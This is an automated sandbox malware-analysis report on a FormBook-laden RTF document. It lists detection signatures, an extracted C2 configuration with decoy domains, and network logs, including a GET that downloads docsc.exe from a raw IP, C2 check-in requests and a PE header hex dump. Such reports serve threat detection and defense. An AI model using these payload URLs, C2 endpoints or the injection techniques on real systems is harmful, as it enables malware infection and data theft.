Analysis Report 1c60a1e9_by_Libranalysis

Overview

General Information

Sample Name: 1c60a1e9_by_Libranalysis (renamed file extension from none to rtf)
Analysis ID: 412069
MD5: 1c60a1e972aaa5a3eb15c0adc2de7ead
SHA1: 921fed27f6b23f7f810ee03eeefb91634a295592
SHA256: 605e84b01e008da482a744feb468d9dd842148850fda1694a6772b6e38cc6c82
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Microsoft Office creates scripting files
Modifies the context of a thread in another process (thread injection)
Office process drops PE file
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: Non Interactive PowerShell
Sigma detected: PowerShell Download from URL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}
Multi AV Scanner detection for submitted file
Source: 1c60a1e9_by_Libranalysis.rtf ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\docsc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 12.2.docsc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: docsc[1].exe.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_001D1660
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_001D1577
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_001D16D8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then pop ebx 12_2_00406A9A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop ebx 14_2_00086A9A
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.boostcoachingonline.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.rogegalmish.com/a8si/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.thepocket-onlinelesson.xyz
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 May 2021 09:33:33 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 12 May 2021 07:52:57 GMTETag: "edc00-5c21d4c824840"Accept-Ranges: bytesContent-Length: 973824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 May 2021 09:33:42 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 12 May 2021 07:52:57 GMTETag: "edc00-5c21d4c824840"Accept-Ranges: bytesContent-Length: 973824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Host: 157.55.173.72Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.applewholesales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1Host: www.southernbrushworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.betsysellsswfl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1Host: www.ethereumdailypay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.foreverjsdesigns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 75.2.115.196 75.2.115.196
Source: Joe Sandbox View IP Address: 184.168.131.241 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.55.173.72Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADCC7F3-349E-46EF-BF24-C3A751787722}.tmp Jump to behavior
